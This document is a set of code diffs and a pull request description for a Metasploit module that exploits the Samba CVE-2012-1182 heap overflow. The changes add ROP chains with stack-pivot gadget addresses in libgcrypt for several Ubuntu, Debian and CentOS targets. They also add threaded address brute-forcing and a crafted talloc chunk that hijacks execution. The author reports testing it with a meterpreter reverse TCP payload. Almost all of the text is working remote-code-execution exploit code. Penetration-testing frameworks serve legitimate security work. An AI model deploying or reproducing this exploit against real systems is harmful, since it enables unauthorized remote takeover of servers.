+                <gadget offset="0x0006200a">pushad ; ret</gadget>
+                <gadget value ="size">payload size</gadget>
+        </gadgets>
+
+
+    </rop>
 
 
 

--- a/modules/exploits/linux/samba/setinfopolicy_heap.rb
+++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',
 							'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0
 							'Start' => 0xb67f1000 ,
-							'Stop'  => 0xb6a5b000 ,
+							'Stop'  => 0xb69ef000 ,
 							'Step'  => 0x1000,
 						}
 					],
@@ -131,7 +131,19 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Stop'  => 0xb6a61000 ,
 							'Step'  => 0x1000,
 						}
+					],
+					['3.5.10-0.107.el5 on CentOS 5',
+						{
+							'Arch' => ARCH_X86,
+							'Offset' => 0x11c0,
+							'Ropname' => '3.5.10-0.107.el5 on CentOS 5',
+							'Stackpivot' => 0x0006ad7e, #xchg eax, esp ; xchg eax, ebx ; add eax, 0xCB313435 ; or ecx, eax ; ret in libgcrypt.so.11.5.2
+							'Start' => 0xb6962000 ,
+							'Stop'  => 0xb6a61000 ,
+							'Step'  => 0x1000,
+						}
 					]
+
 				],
 			'DisclosureDate' => 'Apr 10 2012',
 			'DefaultTarget'  => 0

--- a/modules/exploits/linux/samba/setinfopolicy_heap.rb
+++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::DCERPC
 	include Msf::Exploit::Remote::SMB
-	include Msf::Exploit::Brute
+	include Msf::Exploit::RopDb
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					'Unknown', # Vulnerability discovery
 					'blasty', # Exploit
-					'mephos', # Debian Squeeze target
+					'mephos', # Metasploit module
 					'sinn3r', # Metasploit module
 					'juan vazquez' # Metasploit module
 				],
@@ -50,64 +50,88 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Payload'        =>
 				{
 					'DisableNops' => true,
-					'Space'       => 811,
-					'Compat'      =>
-						{
-							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic bash telnet python perl'
-						}
+					'Space'       => 600,
 				},
-			'Platform'       => 'unix',
-			'Arch'           => ARCH_CMD,
+#			'SessionTypes'  => [ 'shell', 'meterpreter' ],
+			'SessionTypes'  => [ 'meterpreter' ],
+			'Platform'      => ['unix', 'linux'],
+			# smbd process is killed soon after being exploited, need fork with meterpreter
+			'DefaultOptions' => { "PrependSetreuid" => true, "PrependSetregid" => true, "PrependFork" => true, "AppendExit" => true, "WfsDelay" => 5},
 			'Targets'        =>
 				[
-					# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1'
-					['2:3.5.11~dfsg-1ubuntu2 and 2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.10',
+					['2:3.5.11~dfsg-1ubuntu2 on Ubuntu 11.10',
 						{
+							'Arch' => ARCH_X86,
 							'Offset' => 0x11c0,
-							'Bruteforce' =>
-							{
-								# The start for the final version should be 0xb20 aligned, and then step 0x1000.
-								'Start' => { 'Ret' => 0x00230b20 },
-								'Stop'  => { 'Ret' => 0x22a00b20 },
-								'Step'  => 0x1000
-							}
+							'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',
+							'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0
+							'Start' => 0xb67f1000 ,
+							'Stop'  => 0xb6a5b000 ,
+							'Step'  => 0x1000,
 						}
 					],
-					['2:3.5.8~dfsg-1ubuntu2 and 2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04',
+					['2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.10',
 						{
+							'Arch' => ARCH_X86,
 							'Offset' => 0x11c0,
-							'Bruteforce' =>
-							{
-								# The start should be 0x950 aligned, and then step 0x1000.
-								'Start' => { 'Ret' => 0x00230950 },
-								'Stop'  => { 'Ret' => 0x22a00950 },
-								'Step'  => 0x1000
-							}
+							'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',
+							'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0
+							'Start' => 0xb68d9000 ,
+							'Stop'  => 0xb6ad7000 ,
+							'Step'  => 0x1000,
 						}
 					],
+					['2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.04',
+						{
+							'Arch' => ARCH_X86,
+							'Offset' => 0x11c0,
+							'Ropname' => 'Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2',
+							# when stack pivoting, we control dword [esi] (field "next" in talloc chunk), ecx and [esp+4] point to shellcode
+							'Stackpivot' => 0x0006af03, # pop ecx ; jmp dword [esi]  in /lib/i386-linux-gnu/libgcrypt.so.11.6.0
+							# we jump on "pop ecx, jmp dword [esi] to remove 4 bytes from the stack, then jump on pop esp.. gadget
+							# to effectively stack pivot
+							'Stackpivot_helper' => 0x00054e87, #pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret  ;
+							'Start' => 0xb6973000 ,
+							'Stop'  => 0xb6b71000 ,
+							'Step'  => 0x1000,
+						}
+					],
+					# default version when installing 11.04 is 3.5.8 , 3.5.4 was PROPOSED on CD months before release date
+					#['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04',
+					#	{
+					#		'Arch' => ARCH_CMD,
+					#		'Offset' => 0x11c0,
+					#		'Ropname' => 'Ubuntu 11.04 / 2:3.5.4~dfsg-1ubuntu8',
+					#		'Stackpivot' => 0,
+					#		'Bruteforce' =>
+					#		{
+					#			# The start should be 0x950 aligned, and then step 0x1000.
+					#			'Start' => { 'Ret' => 0x00230950 },
+					#			'Stop'  => { 'Ret' => 0x22a00950 },
+					#			'Step'  => 0x1000
+					#		}
+					#	}
+					#],
 					['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 10.10',
 						{
+							'Arch' => ARCH_X86,
 							'Offset' => 0x11c0,
-							'Bruteforce' =>
-							{
-								# The start should be 0x680 aligned, and then step 0x1000.
-								'Start' => { 'Ret' => 0x00230680 },
-								'Stop'  => { 'Ret' => 0x22a00680 },
-								'Step'  => 0x1000
-							}
+							'Ropname' => 'Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8',
+							'Stackpivot' => 0x0003e4bc, #xchg eax, esp ; ret in libgcrypt.so.11.5.3
+							'Start' => 0xb694f000 ,
+							'Stop'  => 0xb6b4d000 ,
+							'Step'  => 0x1000,
 						}
 					],
 					['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',
 						{
+							'Arch' => ARCH_X86,
 							'Offset' => 0x11c0,
-							'Bruteforce' =>
-							{
-								# The start should be 0x680 aligned, and then step 0x1000.
-								'Start' => { 'Ret' => 0xb6aaa1b0 },
-								'Stop'  => { 'Ret' => 0xb6ce91b0 },
-								'Step'  => 0x1000
-							}
+							'Ropname' => 'Debian Squeeze / 2:3.5.6~dfsg-3squeeze6',
+							'Stackpivot' => 0x0003e30c, #xchg eax, esp ; ret in libgcrypt.so.11.5.3
+							'Start' => 0xb6962000 ,
+							'Stop'  => 0xb6a61000 ,
+							'Step'  => 0x1000,
 						}
 					]
 				],
@@ -117,28 +141,53 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options([
 			OptInt.new("StartBrute", [ false, "Start Address For Brute Forcing" ]),
-			OptInt.new("StopBrute", [ false, "Stop Address For Brute Forcing" ])
+			OptInt.new("StopBrute", [ false, "Stop Address For Brute Forcing" ]),
+			OptInt.new("Delay", [false,  "This option sets the delay in ms between each thread", 750])
 		], self.class)
 
 	end
 
 	def exploit
-		if target.bruteforce?
-			bf = target.bruteforce
+		start = target["Start"]
+		stop = target["Stop"]
+		step = target["Step"]
+		delay = datastore["Delay"] || 750
 
-			if datastore['StartBrute'] and datastore['StartBrute'] > 0
-				bf.start_addresses['Ret'] = datastore['StartBrute']
-			end
+		start = datastore["StartBrute"] if (datastore["StartBrute"] and datastore["StartBrute"] > 0 )
+		stop  = datastore["StopBrute"] if (datastore["StopBrute"] and datastore["StopBrute"] > 0 )
 
-			if datastore['StopBrute'] and datastore['StopBrute'] > 0
-				bf.stop_addresses['Ret'] = datastore['StopBrute']
-			end
-
-			if bf.start_addresses['Ret'] > bf.stop_addresses['Ret']
-				raise ArgumentError, "StartBrute should not be larger than StopBrute"
-			end
+		if start > stop
+			raise ArgumentError, "StartBrute should not be larger than StopBrute"
 		end
-		super
+
+		curr_addr = start
+		i = 0
+		count = (stop-start)/step
+
+		while curr_addr <= stop and not session_created?
+			t = []
+			1.upto(20) do
+				break if session_created?
+				i += 1
+				t << framework.threads.spawn("Module(#{self.refname})-#{curr_addr}",false, curr_addr, i, count) do |addr, i, count|
+					begin
+						ok = false
+						while ok != true
+							begin
+								do_one(addr, i, count)
+								ok = true
+							rescue ::Exception => e
+								print_status("The following  error was encountered: #{e.class} #{e}, retrying with same address")
+							end
+						end
+					end
+				end
+				curr_addr += step
+				break if curr_addr > stop
+				select(nil, nil, nil, delay/1000.0)
+			end
+			t.each {|x| x.join}
+		end
 	end
 
 	def check
@@ -162,30 +211,44 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 	end
 
-	def brute_exploit(target_addrs)
-
-		print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret'])
+	def do_one(addr, i, count)
+		print_status("Trying to exploit Samba with address 0x%.8x (%i/%i)..." % [addr, i, count])
 		datastore['DCERPC::fake_bind_multi'] = false
 		datastore['DCERPC::max_frag_size'] = 4248
+		datastore['DCERPC::smb_pipeio'] = 'trans'
+		datastore['DCERPC::ReadTimeout'] = 3
 
 		pipe = "lsarpc"
 
-		print_status("Connecting to the SMB service...")
+
 		connect()
-		print_status("Login to the SMB service...")
 		smb_login()
 
 		handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
-		print_status("Binding to #{handle} ...")
 		dcerpc_bind(handle)
-		print_status("Bound to #{handle} ...")
-
-		stub = "X" * 20
+		dcerpc.socket.mode = 'rw'
+		# revert for other exploits
+		datastore['DCERPC::smb_pipeio'] = 'rw'
 
 		cmd = ";;;;" # padding
-		cmd << "#{payload.encoded}\x00" # system argument
-		tmp = cmd * (816/cmd.length)
-		tmp << "\x00"*(816-tmp.length)
+		helper = 0
+		if target['Arch'] == ARCH_CMD
+			cmd << "#{payload.encoded}\x00" # system argument
+			tmp = cmd * (816/cmd.length)
+			tmp << "\x00"*(816-tmp.length)
+			ret_addr =  addr
+		elsif target['Arch'] == ARCH_X86
+			cmd << generate_rop_payload('samba', payload.encoded,{'target'=>target['Ropname'], 'base'=> addr })
+			tmp = cmd
+			tmp << "\x00"*(816-tmp.length)
+			ret_addr = addr+target['Stackpivot']
+			# will help in stack pivot when it's not eax pointing to shellcode
+			if target['Stackpivot_helper']
+				helper = addr+target['Stackpivot_helper']
+			end
+		end
+
+		stub = "X" * 20
 
 		stub << NDR.short(2)     # level
 		stub << NDR.short(2)     # level 2
@@ -197,10 +260,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		stub << NDR.long(100)
 		stub << rand_text_alpha(target['Offset'])
 		# Crafted talloc chunk
-		stub << 'A' * 8                       # next, prev
+		#stub << 'A' * 8                       # next, prev
+		stub << NDR.long(helper) + 'A'*4        # next, prev
 		stub << NDR.long(0) + NDR.long(0)     # parent, child
 		stub << NDR.long(0)                   # refs
-		stub << NDR.long(target_addrs['Ret']) # destructor # will become EIP
+#		stub << NDR.long(target_addrs['Ret']) # destructor # will become EIP
+		stub << NDR.long(ret_addr) # destructor # will become EIP
 		stub << NDR.long(0)                   # name
 		stub << "AAAA"                        # size
 		stub << NDR.long(0xe8150c70)          # flags
@@ -209,22 +274,22 @@ class Metasploit3 < Msf::Exploit::Remote
 		stub << rand_text(32632)
 		stub << rand_text(62000)
 
-		print_status("Calling the vulnerable function...")
-
 		begin
 			call(dcerpc, 0x08, stub)
 		rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
-			print_status('Server did not respond, this is expected')
 		rescue Rex::Proto::DCERPC::Exceptions::Fault
 			print_error('Server is most likely patched...')
+		rescue Timeout::Error
+			print_status("Timeout")
+		rescue Rex::Proto::SMB::Exceptions::LoginError
+			print_status("Rex::Proto::SMB::Exceptions::LoginError")
 		rescue => e
 			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
 				print_status('Server disconnected, this is expected')
 			end
 		end
-
-		handler
-		disconnect
+		handler()
+		disconnect()
 	end
 
 	# Perform a DCE/RPC Function Call

--- a/modules/exploits/linux/samba/setinfopolicy_heap.rb
+++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb
@@ -52,8 +52,6 @@ class Metasploit3 < Msf::Exploit::Remote
 					'DisableNops' => true,
 					'Space'       => 600,
 				},
-#			'SessionTypes'  => [ 'shell', 'meterpreter' ],
-			'SessionTypes'  => [ 'meterpreter' ],
 			'Platform'      => ['unix', 'linux'],
 			# smbd process is killed soon after being exploited, need fork with meterpreter
 			'DefaultOptions' => { "PrependSetreuid" => true, "PrependSetregid" => true, "PrependFork" => true, "AppendExit" => true, "WfsDelay" => 5},

--- a/modules/exploits/linux/samba/setinfopolicy_heap.rb
+++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb
@@ -138,8 +138,8 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Offset' => 0x11c0,
 							'Ropname' => '3.5.10-0.107.el5 on CentOS 5',
 							'Stackpivot' => 0x0006ad7e, #xchg eax, esp ; xchg eax, ebx ; add eax, 0xCB313435 ; or ecx, eax ; ret in libgcrypt.so.11.5.2
-							'Start' => 0xb6962000 ,
-							'Stop'  => 0xb6a61000 ,
+							'Start' => 0x0037c000 ,
+							'Stop'  => 0x09e73000 ,
 							'Step'  => 0x1000,
 						}
 					]


### PR DESCRIPTION
add support for arbitrary payload in samba CVE-2012-1182 exploit

ROP is performed against libgcrypt.so which is rarely modified/updated
Libgcrypt has been patched/modified after samba CVE was released, so if libgcrypt was updated on the system, samba was _very_ probably updated too and is no longer vulnerable

This way, ROP chain can be generic across minor versions of samba( 3.5.8~dfsg-1ubuntu2 , ubuntu2.1, ubuntu2.2 ...)

I left ROP chains for smbd binaries if someone's interested in it

ROP chain does mmap(PROT_WRITE|PROT_EXEC), memcpy and jmp on shellcode

Tested on ubuntu 10.10, 11.04, 11.10 and debian squeeze using meterpreter/reverse_tcp
